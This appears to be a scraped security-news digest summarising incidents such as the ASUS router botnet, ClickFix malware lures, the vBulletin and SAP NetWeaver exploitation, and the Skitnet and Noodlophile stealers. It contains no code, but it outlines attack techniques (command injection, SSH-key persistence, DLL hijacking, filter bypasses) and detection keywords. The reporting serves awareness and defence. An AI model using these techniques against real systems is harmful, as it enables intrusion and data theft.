@cyberinsider.com
//
References:
cyberinsider.com
, securityonline.info
Mozilla has released Firefox 139 to address a critical security vulnerability within the libvpx video codec encoder. This flaw, identified as a double-free vulnerability, could potentially lead to memory corruption and allow for arbitrary code execution on affected systems. Security experts are urging users to update to the latest version of Firefox immediately to mitigate the risk.
The vulnerability is particularly concerning because it is a zero-interaction exploit, meaning that an attacker could potentially execute malicious code without any user action beyond normal browsing activity. This underscores the importance of applying the patch as soon as possible to prevent potential compromise. The update aims to protect users from remote code execution attacks that could exploit the flaw in the libvpx codec. The Cybersecurity community has highlighted the importance of prioritizing critical patches such as this one to defend against exploitation. This vulnerability demonstrates the persistent threat landscape and the need for constant vigilance in maintaining secure systems. By updating to Firefox 139, users can ensure they are protected against this potentially severe vulnerability. Recommended read:
References :
Pierluigi Paganini@securityaffairs.com
//
GreyNoise researchers have uncovered a significant and stealthy campaign exploiting ASUS routers, leading to the formation of a new botnet dubbed "AyySSHush". This long-running operation has compromised thousands of ASUS routers, with numbers steadily increasing. The attackers are gaining unauthorized, persistent access to the devices, effectively establishing a distributed network of backdoors, potentially laying the foundation for a future, larger botnet.
This attack is achieved through a sophisticated, multi-step exploitation chain, showcasing advanced knowledge of ASUS systems. Initial access is gained through brute-force login attempts and previously undocumented authentication bypasses. Attackers then exploit CVE-2023-39780, a command injection vulnerability, to execute system commands. This allows them to enable SSH access on a custom port and insert an attacker-controlled SSH public key, granting persistent remote access. The AyySSHush botnet's stealth is enhanced by disabling router logging to evade detection and avoiding the installation of any malware. Crucially, the backdoor is stored in non-volatile memory (NVRAM), ensuring it survives both firmware upgrades and reboots. As of late May 2025, data confirmed that over 9,000 ASUS routers had been compromised. This campaign highlights the critical need for prompt patching of router vulnerabilities to prevent exploitation and botnet recruitment. Recommended read:
References :
@www.microsoft.com
//
References:
mfesgin.github.io
, IACR News
IACR News has highlighted recent advancements in post-quantum cryptography, essential for safeguarding data against future quantum computer attacks. A key area of focus is the development of algorithms and protocols that remain secure even when classical cryptographic methods become vulnerable. Among these efforts, FrodoKEM stands out as a conservative quantum-safe cryptographic algorithm, designed to provide strong security guarantees in the face of quantum computing threats.
The adaptive security of key-unique threshold signatures is also under scrutiny. Research presented by Elizabeth Crites, Chelsea Komlo, and Mary Mallere, investigates the security assumptions required to prove the adaptive security of threshold signatures. Their work reveals impossibility results that highlight the difficulty of achieving adaptive security for key-unique threshold signatures, particularly for schemes compatible with standard, single-party signatures like BLS, ECDSA, and Schnorr. This research aims to guide the development of new assumptions and properties for constructing adaptively secure threshold schemes. In related news, Muhammed F. Esgin is offering PhD and Post-Doc positions in post-quantum cryptography, emphasizing the need for candidates with a strong mathematical and cryptography background. Students at Monash University can expect to work on their research from the beginning, supported by competitive stipends and opportunities for teaching assistant roles. These academic opportunities are crucial for training the next generation of cryptographers who will develop and implement post-quantum solutions. Recommended read:
References :
Puja Srivastava@Sucuri Blog
//
Cybercriminals are increasingly employing sophisticated social engineering techniques to distribute malware, with a recent surge in attacks leveraging fake CAPTCHA prompts and AI-generated TikTok videos. These campaigns, collectively known as "ClickFix," manipulate users into executing malicious PowerShell commands, leading to system compromise and the installation of information-stealing malware. A notable example involves a fake Google Meet page hosted on compromised WordPress sites, which tricks visitors into copying and pasting a specific PowerShell command under the guise of fixing a "Microphone Permission Denied" error. Once executed, the command downloads a remote access trojan (RAT), granting attackers full control over the victim's system.
The ClickFix technique is also being amplified through AI-generated TikTok videos that promise free access to premium software like Windows, Microsoft Office, Spotify, and CapCut. These videos instruct users to run PowerShell scripts, which instead install Vidar and StealC malware, capable of stealing login credentials, credit card data, and 2FA codes. Trend Micro researchers note that the use of AI allows for rapid production and tailoring of these videos to target different user segments. These tactics have proven highly effective, with one video promising to "boost your Spotify experience instantly" amassing nearly 500,000 views. Detecting and preventing ClickFix attacks requires a multi-faceted approach. Security experts recommend disabling the Windows Run program via Group Policy Objects (GPOs) or turning off the "Windows + R" hotkey. Additionally, users should exercise caution when encountering unsolicited technical instructions, verify the legitimacy of video sources, and avoid running PowerShell commands from untrusted sources. Monitoring for keywords like "not a robot," "captcha," "secure code," and "human" in process creation events can also help identify potential attacks. These measures, combined with public awareness, are crucial in mitigating the growing threat posed by ClickFix campaigns. Recommended read:
References :
@securityonline.info
//
A critical security vulnerability has been discovered in vBulletin forum software, tracked as CVE-2024-45721, that enables unauthenticated attackers to execute arbitrary code on unpatched systems. This flaw puts millions of online communities at risk of full server compromise. The vulnerability affects vBulletin versions 6.0.0 through 6.1.4 and stems from improper sanitization of user inputs in template rendering modules. Discovered by cybersecurity firm SentinelWatch on May 22, 2025, the flaw has already seen significant exploitation attempts, with over 12,000 attack vectors targeting forums in various sectors within 48 hours of public disclosure.
Exploitation of the vulnerability involves crafting malicious forum posts containing payloads that bypass built-in sandboxing through parameter smuggling techniques. Attackers leverage vBulletin’s `vb:rawtemplate` directive, which fails to properly validate nested function calls when processing user-generated content. Successful exploitation grants SYSTEM-level privileges on Windows hosts and www-data access on Linux systems, enabling the installation of web shells, credential harvesters, and cryptocurrency miners. Proof-of-concept exploits have demonstrated the ability to execute OS commands even when PHP security hardening measures are present, by using PHP's `unserialize()` function with crafted OPcache configurations to bypass `disable_functions` restrictions. In response to the widespread exploitation, vBulletin released patch 6.1.5 on May 25, 2025, which introduces granular template validation. However, as of the latest reports, 68% of installations remain unupdated, leaving a significant number of forums vulnerable. Observed attack clusters include cryptojacking campaigns, data exfiltration, and precursors to ransomware attacks. Notably, 58% of compromised forums had hidden Monero miners installed, while attackers cloned user databases from 23 gaming communities containing 14 million records, now circulating on dark web markets. Additionally, six enterprise forums received tailored malware potentially leading to Black Basta ransomware deployment. Recommended read:
References :
Pierluigi Paganini@Security Affairs
//
The FBI has issued a warning to U.S. law firms regarding an escalating cyber threat posed by the Silent Ransom Group (SRG), also known as Luna Moth or Chatty Spider. This group, active since 2022, has refined its tactics to target law firms specifically since early 2023, likely due to the valuable and confidential client data they possess. The group aims to gain unauthorized access to systems and devices in order to steal sensitive information and extort victims with threats of public data leaks.
SRG's methods include IT-themed social engineering calls and callback phishing emails. In these attacks, they impersonate IT personnel to deceive employees into granting remote access to systems. They may direct the employee to a malicious website or send a link via email that installs remote access software. Once inside, the attackers discreetly extract sensitive files using tools like WinSCP or disguised versions of Rclone. This campaign is particularly dangerous because it leaves minimal digital traces and can bypass traditional security measures. To defend against these attacks, the FBI urges law firms to enhance staff training to recognize and avoid social engineering tactics. Implementing multi-factor authentication is crucial, as is proactive monitoring for unauthorized access attempts. The agency also advises that victims share any ransom evidence with law enforcement to aid in investigations. Furthermore, CISOs are encouraged to fortify help desk and employee defenses, enhance intrusion detection and tracking capabilities, and recognize that paying ransoms is not a viable strategy. Recommended read:
References :
karlo.zanki@reversinglabs.com (Karlo@Blog (Main)
//
References:
Blog (Main)
, www.tripwire.com
,
Cybersecurity experts are raising alarms over the increasing use of artificial intelligence for malicious purposes. ReversingLabs (RL) researchers recently discovered a new malicious campaign targeting the Python Package Index (PyPI) that exploits the Pickle file format. This attack involves threat actors distributing malicious ML models disguised as a "Python SDK for interacting with Aliyun AI Labs services," preying on users of Alibaba AI labs. Once installed, the package delivers an infostealer payload hidden inside a PyTorch model, exfiltrating sensitive information such as machine details and contents of the .gitconfig file. This discovery highlights the growing trend of attackers leveraging AI and machine learning to compromise software supply chains.
Another significant security concern is the rise of ransomware attacks employing social engineering tactics. The 3AM ransomware group has been observed impersonating IT support personnel to trick employees into granting them remote access to company networks. Attackers flood an employee's inbox with unsolicited emails and then call, pretending to be from the organization's IT support, using spoofed phone numbers to add credibility. They then convince the employee to run Microsoft Quick Assist, granting them remote access to "fix" the email issue, allowing them to deploy malicious payloads, create new user accounts with admin privileges, and exfiltrate large amounts of data. This highlights the need for comprehensive employee training to recognize and defend against social engineering attacks. The US Department of Justice has announced charges against 16 Russian nationals allegedly tied to the DanaBot malware operation, which has infected at least 300,000 machines worldwide. The indictment describes how DanaBot was used in both for-profit criminal hacking and espionage against military, government, and NGO targets. This case illustrates the blurred lines between cybercrime and state-sponsored cyberwarfare, with a single malware operation enabling various malicious activities, including ransomware attacks, cyberattacks in Ukraine, and spying. The Defense Criminal Investigative Service (DCIS) has seized DanaBot infrastructure globally, underscoring the severity and scope of the threat posed by this operation. Recommended read:
References :
CISA@All CISA Advisories
//
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning regarding a potential broader campaign targeting Software-as-a-Service (SaaS) providers. This alert follows the discovery of unauthorized activity within Commvault's Microsoft Azure environment. CISA believes threat actors may have gained access to client secrets for Commvault's Metallic Microsoft 365 (M365) backup SaaS solution hosted in Azure. This access could allow the threat actors to compromise Commvault's customers' M365 environments where application secrets are stored by Commvault.
The suspected campaign exploits default configurations and elevated permissions in cloud applications, making SaaS companies with weak security a prime target. The initial incident involved a zero-day vulnerability, CVE-2025-3928, in Commvault's Web Server, allowing remote, authenticated attackers to create and execute web shells. Commvault confirmed that Microsoft notified them of the unauthorized activity in February 2025, leading to an investigation and remediation efforts. Despite the breach, Commvault assured customers that there was no unauthorized access to their backup data, and they have rotated app credentials for M365 as a preventative measure. CISA has provided recommendations for users and administrators to mitigate such threats, including monitoring Entra audit logs for unauthorized modifications, reviewing Microsoft logs for suspicious activity, and implementing conditional access policies to restrict application service principal authentication to approved IP addresses. They also advise reviewing Application Registrations and Service Principals in Entra, restricting access to Commvault management interfaces, and deploying a Web Application Firewall to detect and block path-traversal attempts. These steps aim to strengthen the security posture of SaaS applications and prevent further exploitation of vulnerabilities. Recommended read:
References :
@securebulletin.com
//
A new wave of cyberattacks is leveraging sophisticated social engineering techniques combined with technical exploits to breach corporate networks. Security firms are reporting a rise in attacks linked to the 3AM ransomware operation. These attacks begin with an overwhelming flood of emails, known as email bombing, directed at specific employees. This is followed by spoofed phone calls where the attackers impersonate the organization's IT support team, attempting to trick the employee into granting remote access to their computer. The attackers’ use of real phone calls marks a notable escalation in social engineering sophistication.
Once the attackers have gained the trust of the employee, they will try to convince them to run Microsoft Quick Assist, a legitimate remote access tool. This grants the attackers remote access to the victim's machine under the guise of fixing a problem. This initial access is then used to deploy a malicious payload, which may include virtual machines or other tools designed to evade detection by security software. After gaining control of the system they install malicious software, create new user accounts, and gain admin privileges. Sophos has documented multiple ransomware actors leveraging an attack pattern first reported by Microsoft using “email bombing” to overload a targeted organization’s employee with unwanted emails, and then making a voice or video call over Microsoft Teams posing as a tech support team member to deceive that employee into allowing remote access to their computer. BleepingComputer reports that highly targeted intrusions involving email bombing and fake IT support calls have been launched by threat actors linked to the 3AM ransomware operation during the first quarter of this year. This allows the attackers to perform reconnaissance, create local admin accounts, and install remote management tools for persistence and lateral movement within the network, often resulting in significant data exfiltration. Recommended read:
References :
Andres Ramos@Arctic Wolf
//
Versa Concerto, a network security and SD-WAN orchestration platform, is facing scrutiny after the public disclosure of multiple unpatched vulnerabilities. ProjectDiscovery researchers revealed technical details on May 21, 2025, following a 90-day responsible disclosure period that began on February 13, 2025. The disclosed flaws include authentication bypasses, remote code execution (RCE), and container escapes, posing a significant threat to the platform and its underlying host systems. The platform is a Spring Boot-based application deployed via Docker containers and routed through Traefik, making it vulnerable to attacks targeting these components.
These vulnerabilities, when chained together, could allow a complete system compromise. One notable flaw, CVE-2025-34027, carries a maximum severity score of 10.0 and involves a URL decoding inconsistency issue. This could facilitate unauthorized access to file upload endpoints and enable remote code execution. Other critical vulnerabilities include CVE-2025-34026, an authentication bypass allowing access to administrative endpoints, and CVE-2025-34025, a privilege escalation leading to Docker container escape and code execution on the host machine. Despite the disclosure of these vulnerabilities, Versa Networks has stated that patches were implemented in early March and made publicly available in mid-April. According to a Versa Networks spokesperson, all affected customers were notified through established security and support channels with guidance on applying the recommended updates, and there is no indication that these vulnerabilities were exploited in the wild. However, ProjectDiscovery researchers initially noted the lack of patches, prompting the need for public disclosure after the 90-day deadline passed. Recommended read:
References :
@arstechnica.com
//
Signal, the privacy-focused messaging application, has taken action to block Microsoft's controversial Recall feature from capturing screenshots of its desktop app content on Windows 11. Citing privacy concerns over Recall's ability to automatically take screenshots of on-screen activity, Signal has implemented a "screen security" setting, enabled by default, that leverages Digital Rights Management (DRM) to prevent the tool from accessing and recording private conversations. This move comes as Signal expresses discontent with Microsoft's approach, arguing that Recall lacks sufficient developer controls to exclude specific apps and protect sensitive information.
Microsoft's Recall feature, designed for Copilot+ PCs, works by continuously taking screenshots and creating a searchable database of user activity. Signal argues that this poses a significant risk to the privacy of its users, as private conversations could be inadvertently captured and stored. By implementing DRM, Signal sets a flag on its application window that instructs Recall, and any other screenshotting application, to ignore its content. While Signal acknowledges this is a blunt tool that may interfere with accessibility software, it believes Microsoft left them with no other choice. Signal has criticized Microsoft for not providing developers with the necessary tools to manage how Recall interacts with their applications. The messaging app argues that it shouldn't have to resort to using DRM "content protection hacks" to safeguard user privacy. Signal hopes that AI teams building systems like Recall will carefully consider the privacy implications and avoid forcing apps to use workarounds to protect the integrity of their services. They want the AI teams to know that this will potentially affect accessibility options like screen readers. Recommended read:
References :
info@thehackernews.com (The@The Hacker News
//
Chinese-speaking hackers have exploited a zero-day vulnerability, CVE-2025-0994, in Trimble Cityworks software to breach multiple local governing bodies across the United States. This vulnerability, a remote code execution flaw, has been actively exploited since January 2025 by a threat actor tracked as UAT-6382. The attackers targeted enterprise networks of local governing bodies, conducting reconnaissance and deploying web shells and custom-made malware to maintain long-term access, with a particular interest in systems related to utilities management.
UAT-6382 utilized a variety of tools and techniques in their attacks. They rapidly deployed web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers. Additionally, they employed Rust-based loaders, known as TetraLoader, to deliver Cobalt Strike and VShell malware, ensuring persistent access to compromised systems. The TetraLoader was built using MaLoader, a malware building framework written in Simplified Chinese, further indicating the origin of the threat actor. Cisco Talos researchers have assessed with high confidence that UAT-6382 is a Chinese-speaking threat actor, based on tooling, TTPs, hands-on-keyboard activity, and victimology. Indicators of compromise (IOCs) related to these intrusions overlap with those listed in Trimble’s advisory. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-0994 to its Known Exploited Vulnerabilities (KEV) catalog in February 2025. The exploitation of this flaw highlights the risk of nation-state actors targeting critical infrastructure software used by U.S. local governments and utilities. Recommended read:
References :
@www.first.org
//
References:
Metacurity
, thecyberexpress.com
Researchers from the U.S. National Institute of Standards and Technology (NIST) and the Cybersecurity and Infrastructure Security Agency (CISA) have collaborated to develop a new security metric designed to better assess the likelihood of vulnerability exploitation. This metric aims to enhance the existing Exploit Prediction Scoring System (EPSS) and CISA's Known Exploited Vulnerabilities (KEV) catalog, providing a more refined approach to identifying vulnerabilities that are at high risk of being exploited in the wild. Peter Mell, formerly of NIST, and Jonathan Spring from CISA are credited with outlining this vulnerability exploit metric.
This new metric, detailed in a NIST White Paper titled "Likely Exploited Vulnerabilities," seeks to improve the accuracy with which vulnerabilities are prioritized for remediation. By augmenting the EPSS and KEV lists, the metric intends to provide a clearer understanding of a vulnerability's exploitability. The researchers propose this augmentation as a means to better express how likely a vulnerability is to be exploited, which can aid organizations in focusing their security efforts on the most critical threats. Meanwhile, CISA has recently added six new vulnerabilities to its Known Exploited Vulnerabilities catalog, underscoring the importance of addressing actively exploited flaws. In a related development, Wiz Research has observed in-the-wild exploitation of CVE-2025-4427 and CVE-2025-4428, two recently disclosed vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM). These Ivanti EPMM vulnerabilities, which involve a chain of exploits leading to remote code execution, highlight the need for organizations to promptly apply security patches and mitigate potential risks. Recommended read:
References :
@cyberscoop.com
//
A 19-year-old college student from Worcester, Massachusetts, Matthew Lane, has agreed to plead guilty to charges related to a massive cyberattack on PowerSchool, a cloud-based education software provider. The cyberattack involved extorting millions of dollars from PowerSchool in exchange for not leaking the personal data of millions of students and teachers. Lane exploited stolen credentials to gain unauthorized access to PowerSchool's networks, leading to the theft of sensitive student and teacher data.
The data breach is considered one of the largest single breaches of American schoolchildren's data, affecting approximately 62.4 million students and 9.5 million teachers. According to court documents, Lane obtained stolen data from a U.S. telecommunications company before targeting PowerSchool. After the initial victim refused to pay a ransom, Lane allegedly sought to hack another company that would pay. The stolen information included sensitive details like Social Security numbers and academic records. Lane will plead guilty to multiple charges, including cyber extortion conspiracy, cyber extortion, unauthorized access to protected computers, and aggravated identity theft. The incident has been described by authorities as a serious attack on the economy, with the potential to instill fear in parents regarding the safety of their children's data. This case highlights the increasing risk of cyberattacks targeting educational institutions and the importance of robust cybersecurity measures to protect student and teacher data. Recommended read:
References :
info@thehackernews.com (The@The Hacker News
//
A new cybersecurity threat, dubbed Hazy Hawk, has emerged, exploiting misconfigured DNS records to hijack abandoned cloud resources. Since at least December 2023, the threat actor has been using DNS CNAME hijacking to seize control of abandoned cloud endpoints belonging to reputable organizations, including Amazon S3 buckets and Microsoft Azure endpoints. By registering new cloud resources with the same names as the abandoned ones, Hazy Hawk redirects traffic to malicious sites, incorporating these hijacked domains into large-scale scam delivery and traffic distribution systems (TDS). This allows them to distribute scams, fake applications, and malware to unsuspecting users, leveraging the trust associated with the original domains.
Infoblox researchers first detected Hazy Hawk's activities in February 2025, when the group successfully took control of subdomains belonging to the U.S. Centers for Disease Control (CDC). Further investigation revealed that global government agencies, major universities, and international corporations such as Deloitte and PricewaterhouseCoopers have also been targeted. Hazy Hawk scans for domains with CNAME records pointing to abandoned cloud endpoints, determining this through passive DNS data validation. They then register a new cloud resource with the same name, causing the original domain's subdomain to resolve to the attacker's controlled resource. The attack chains often involve cloning legitimate websites to appear trustworthy, and URL obfuscation techniques are employed to hide malicious destinations. Hazy Hawk uses hijacked domains to host malicious URLs that redirect users to scams and malware. What makes Hazy Hawk's operations particularly concerning is the use of trusted domains to serve malicious content, enabling them to bypass detection and exploit the reputation of high-profile entities. Cybersecurity experts advise organizations to diligently monitor and manage their DNS records, ensuring that CNAME records pointing to abandoned cloud resources are removed to prevent unauthorized domain hijacking. Recommended read:
References :
@cloudnativenow.com
//
Docker, Inc. has unveiled Docker Hardened Images (DHI), a new offering designed to enhance software supply chain security for application development teams. These curated container images are built to be secure, minimal, and production-ready, providing a trusted foundation for developers working across multiple Linux distributions, including Alpine and Debian. DHI aims to address the growing challenges of securing container dependencies by providing enterprise-grade images with built-in security features.
DHI is integrated directly into Docker Hub, making it easily accessible to developers. Docker Hardened Images are designed to prevent them from being able to run at root, which is an important security consideration. Each curated container image has been digitally signed and complies with the Supply Chain Levels for Software Artifacts (SLSA) framework defined by Google and the Open Source Security Foundation (OpenSSF). Several partners, including Cloudsmith, GitLab, Grype, JFrog, Microsoft, Neo4j, NGINX, Sonatype, Sysdig and Wiz, are also providing hardened container images of their software. The focus of DHI is on practicality and seamless integration into existing developer workflows. Docker is committed to making software supply chain security more accessible and actionable. DHI offers platform engineers a scalable way to manage secure, compliant images with full control over policies and provenance. DHI containers include SBOMs, VEX statements, digital signatures, and SLSA Build Level 3 attestations for full provenance and transparency. Recommended read:
References :
@cyberinsider.com
//
O2 UK has recently patched a security vulnerability in its 4G Calling (VoLTE) and WiFi Calling technologies that could have allowed unauthorized individuals to determine the general location of its mobile users. The flaw stemmed from an improper implementation of the IMS standard, leading to the leakage of user location data through network responses. An attacker could exploit this by simply initiating a phone call to the target, making it a significant privacy concern for O2 UK's nearly 23 million mobile customers. The problem, discovered by security researcher Daniel Williams, is believed to have existed since February 2023 before being resolved.
The vulnerability resided in how O2 UK handled encryption protocols, specifically within the EEA2 encryption algorithm. Researchers from Beijing University of Posts and Telecommunications and the University of Birmingham discovered that this algorithm was not as robust as previously believed, allowing attackers to intercept and decrypt voice call data. By examining the non-encrypted MAC sub-header, attackers could identify the Logical Channel ID (LCID) of the sub-PDU, enabling them to specifically target VoLTE traffic. This exposed call metadata, including call times, duration, direction, and the user's approximate location. O2 UK's swift action to patch the bug demonstrates the critical importance of telecom providers adhering to stringent security standards. Proper validation and security measures in IMS implementations are essential to safeguarding user privacy. The incident serves as a reminder for regular security audits and enhanced protection of user data within telecommunications networks. As VoLTE and WiFi Calling continue to transform communication with superior call quality and reliability, addressing security vulnerabilities is paramount to maintaining user trust and preventing future exploits. Recommended read:
References :
Mandvi@Cyber Security News
//
Skitnet, also known as Bossnet, is a multi-stage malware that has emerged as a favored tool for ransomware gangs, offering stealth and versatility in cybercrime. First advertised on underground forums like RAMP in April 2024, it has quickly gained traction among notorious groups such as BlackBasta. These groups have leveraged Skitnet's capabilities in phishing attacks targeting enterprise platforms like Microsoft Teams. The malware is attributed to threat actor LARVA-306.
Skitnet employs advanced techniques for stealthy payload delivery and persistent system compromise. Its initial executable, written in Rust, decrypts an embedded payload compiled in Nim. The Nim binary then establishes a reverse shell connection with the command-and-control (C2) server via DNS resolution, evading detection by dynamically resolving API function addresses. This method avoids traditional import tables, enhancing its stealth capabilities. The malware initiates the session with randomized DNS queries, creating a robust and stealthy communication channel. To maintain persistence, Skitnet utilizes sophisticated mechanisms such as DLL hijacking. It leverages a legitimate, signed executable from Asus (ISP.exe) placed alongside a malicious library (SnxHidLib.DLL). This malicious DLL triggers the execution of a PowerShell script (pas.ps1), which operates in an infinite loop to relay the device’s C drive serial number to the C2 server, continuously awaiting commands. Skitnet also features commands for data exfiltration and can even download a .NET loader binary for serving additional payloads, showcasing its versatility as a post-exploitation tool. Recommended read:
References :
securebulletin.com@Secure Bulletin
//
Eric Council Jr., a 26-year-old from Alabama, has been sentenced to 14 months in prison for his role in hacking the U.S. Securities and Exchange Commission’s (SEC) X account in January 2024. This breach involved a SIM swap attack, a method where a criminal fraudulently induces a cellular phone carrier to reassign a cellular phone number from a victim’s SIM card to a SIM card controlled by the criminal. Council pleaded guilty in February 2025 to conspiracy charges involving aggravated identity theft and access device fraud, and was sentenced on Friday by Judge Amy Berman Jackson in Washington, D.C.
The hack of the SEC's X account was used to post a false announcement about Bitcoin ETF approvals, which had an immediate and significant impact on the cryptocurrency market. Following the false announcement, the price of Bitcoin increased by more than $1,000 per BTC, but after the SEC regained control and confirmed the announcement as unauthorized, the value of BTC decreased by more than $2,000. Council received $50,000 for his participation in the scheme, which involved using a portable ID card printer to create a fraudulent identification card to impersonate a user of a government phone connected to the SEC’s account on X. In addition to the prison sentence, Council faces further penalties including the forfeiture of $50,000 in Bitcoin proceeds and three years of supervised release with restrictions on dark web access and identity fraud. Prosecutors highlighted Council's post-arrest conduct, which included mocking the SEC's cybersecurity measures. The incident underscores critical vulnerabilities in institutional cybersecurity and highlights the need for stricter carrier verification protocols, especially concerning SIM swap risks, and a move away from over-reliance on SMS-based multi-factor authentication. Recommended read:
References :
Dissent@DataBreaches.Net
//
Coinbase recently disclosed a significant data breach resulting from a bribery scheme targeting overseas customer support agents. The breach, which came to light after a $20 million ransom demand, involved rogue contractors who abused their access to exfiltrate customer data. Coinbase has confirmed that these contractors, located outside the United States, were successfully bribed by cybercriminals to access internal systems and steal sensitive information. Upon discovering the unauthorized activity, Coinbase terminated the involved personnel and initiated a thorough internal investigation.
The compromised data, affecting less than 1% of Coinbase's monthly transacting users, includes names, addresses, phone numbers, email addresses, and the last four digits of Social Security numbers. Additionally, masked bank account numbers, some banking identifiers, government-issued ID images such as driver's licenses and passports, and account data including balance snapshots and transaction histories were exposed. Importantly, Coinbase has stated that no passwords, private keys, or access to customer funds were compromised, and Coinbase Prime accounts and wallets were unaffected. In response to the breach, Coinbase refused to pay the $20 million ransom and instead offered a $20 million reward for information leading to the identification and prosecution of those responsible. The company is also reimbursing customers who mistakenly sent funds to the scammers due to phishing attempts. Furthermore, Coinbase is taking several steps to enhance security, including stricter identity verification, scam-awareness prompts, relocating support functions to a U.S.-based hub, and improving fraud monitoring and insider threat detection capabilities. This incident could potentially cost Coinbase between $180 million and $400 million for remediation and customer reimbursement. Recommended read:
References :
@securebulletin.com
//
China-linked APT groups are actively exploiting a critical vulnerability, CVE-2025-31324, in SAP NetWeaver to breach systems globally. This flaw, an unauthenticated file upload vulnerability, allows for remote code execution, granting unauthorized access to sensitive systems. EclecticIQ assesses with high confidence that these attacks, which commenced in April 2025, are being launched by Chinese nation-state APTs targeting critical infrastructure networks. The scope of the campaign is significant, with evidence indicating the compromise of over 580 SAP NetWeaver instances across various sectors.
Researchers at EclecticIQ uncovered evidence revealing the campaign's breadth. A publicly accessible directory on a threat actor-controlled server contained event logs confirming compromises across 581 SAP NetWeaver instances worldwide. These systems span critical sectors like natural gas distribution networks, water, waste management utilities, medical device manufacturing plants, and government ministries. Additionally, a list of 800 domains running SAP NetWeaver was found, indicating a large pool of potential future targets. The exploitation of CVE-2025-31324 is being attributed to multiple distinct China-linked threat clusters, including CL-STA-0048, UNC5221, and UNC5174. These groups employ various tactics, techniques, and procedures (TTPs), including the use of reverse shells, Rust-based malware loaders like KrustyLoader, and remote access trojans like VShell. In addition to CVE-2025-31324, SAP addressed a second zero-day vulnerability, CVE-2025-42999, which has also been actively exploited in attacks targeting SAP NetWeaver servers and is being used in conjunction with CVE-2025-31324 by threat actors. Recommended read:
References :
Jessica Lyons@theregister.com
//
Marks & Spencer (M&S) has confirmed that customer data was stolen during a recent cyberattack, with the ransomware group DragonForce claiming responsibility. The retail giant has initiated a mandatory password reset for all customers as a precautionary measure following the breach. The attack, which has shaken the UK retail sector, also affected other major retailers including the Co-operative Group (Co-op) and Harrods.
The stolen data includes customer names, dates of birth, home and email addresses, phone numbers, household information, and online order histories. However, M&S assures customers that the compromised information does not include usable card or payment details, or account passwords. The company is working with external experts to secure its systems and has reported the incident to the relevant government authorities and law enforcement agencies. Initially reports linked Scattered Spider to the attack, it has now been claimed that DragonForce are responsible. DragonForce, a relatively new Ransomware-as-a-Service (RaaS) group, has emerged as a significant threat, initially framing itself as a pro-Palestinian hacktivist collective before shifting to profit-driven operations. They operate by leasing their ransomware to affiliates, who then carry out the attacks, with the developers taking a cut of the ransom payments. DragonForce has been targeting high-profile UK retailers, deploying ransomware to encrypt networks, disrupt online orders and payment systems, and threaten the public release of stolen data. Recommended read:
References :
@cyberalerts.io
//
Cybercriminals are exploiting the popularity of AI by distributing the 'Noodlophile' information-stealing malware through fake AI video generation tools. These deceptive websites, often promoted via Facebook groups, lure users with the promise of AI-powered video creation from uploaded files. Instead of delivering the advertised service, users are tricked into downloading a malicious ZIP file containing an executable disguised as a video file, such as "Video Dream MachineAI.mp4.exe." This exploit capitalizes on the common Windows setting that hides file extensions, making the malicious file appear legitimate.
Upon execution, the malware initiates a multi-stage infection process. The deceptive executable launches a legitimate binary associated with ByteDance's video editor ("CapCut.exe") to run a .NET-based loader. This loader then retrieves a Python payload ("srchost.exe") from a remote server, ultimately leading to the deployment of Noodlophile Stealer. This infostealer is designed to harvest sensitive data, including browser credentials, cryptocurrency wallet information, and other personal data. Morphisec researchers, including Shmuel Uzan, warn that these campaigns are attracting significant attention, with some Facebook posts garnering over 62,000 views. The threat actors behind Noodlophile are believed to be of Vietnamese origin, with the developer's GitHub profile indicating a passion for malware development. The rise of AI-themed lures highlights the growing trend of cybercriminals weaponizing public interest in emerging technologies to spread malware, impacting unsuspecting users seeking AI tools for video and image editing. Recommended read:
References :
@cyberpress.org
//
Critical security vulnerabilities have been discovered in Mitel SIP phones, potentially exposing enterprise communication systems to unauthorized access and control. The flaws impact widely deployed models, including the 6800, 6900, and 6900w Series, as well as the 6970 Conference Unit. These vulnerabilities include a command injection flaw (CVE-2025-47188) and an unauthenticated file upload vulnerability (CVE-2025-47187). Mitel has issued a security advisory, MISA-2025-0004, urging users to update their devices immediately.
Mitel's critical command injection vulnerability (CVE-2025-47188) allows unauthenticated attackers with network access to execute arbitrary commands on affected phones. The flaw stems from insufficient sanitization of parameters within the device’s web management interface. With a CVSS score of 9.8, exploitation of this vulnerability could grant attackers control over the device, enabling them to exfiltrate sensitive data, alter system settings, and disrupt operations. This could also allow attackers to use the compromised device as a foothold to pivot deeper into enterprise networks. The affected devices are Mitel 6800, 6900, and 6900w Series SIP Phones, and the 6970 Conference Unit running firmware version R6.4.0.SP4 or earlier. Mitel recommends upgrading to firmware version R6.4.0.SP5 or newer releases to mitigate these risks. While Mitel suggests keeping SIP phones on protected internal networks, organizations with expansive and poorly segmented networks remain at heightened risk. Recommended read:
References :
@cyberalerts.io
//
A new malware campaign is exploiting the hype surrounding artificial intelligence to distribute the Noodlophile Stealer, an information-stealing malware. Morphisec researcher Shmuel Uzan discovered that attackers are enticing victims with fake AI video generation tools advertised on social media platforms, particularly Facebook. These platforms masquerade as legitimate AI services for creating videos, logos, images, and even websites, attracting users eager to leverage AI for content creation.
Posts promoting these fake AI tools have garnered significant attention, with some reaching over 62,000 views. Users who click on the advertised links are directed to bogus websites, such as one impersonating CapCut AI, where they are prompted to upload images or videos. Instead of receiving the promised AI-generated content, users are tricked into downloading a malicious ZIP archive named "VideoDreamAI.zip," which contains an executable file designed to initiate the infection chain. The "Video Dream MachineAI.mp4.exe" file within the archive launches a legitimate binary associated with ByteDance's CapCut video editor, which is then used to execute a .NET-based loader. This loader, in turn, retrieves a Python payload from a remote server, ultimately leading to the deployment of the Noodlophile Stealer. This malware is capable of harvesting browser credentials, cryptocurrency wallet information, and other sensitive data. In some instances, the stealer is bundled with a remote access trojan like XWorm, enabling attackers to gain entrenched access to infected systems. Recommended read:
References :
@cyble.com
//
In May 2025, cybersecurity experts reported a significant surge in hacktivist activity targeting Indian digital infrastructure. This wave of attacks followed the terror attack in Pahalgam, located in the Indian state of Jammu and Kashmir on April 22nd, and India’s retaliatory strikes across the border. A coordinated effort by more than 40 hacktivist groups sought to disrupt and deface numerous Indian websites, leading to widespread alarm across media and social networks as many claimed significant breaches of government, educational, and critical infrastructure websites.
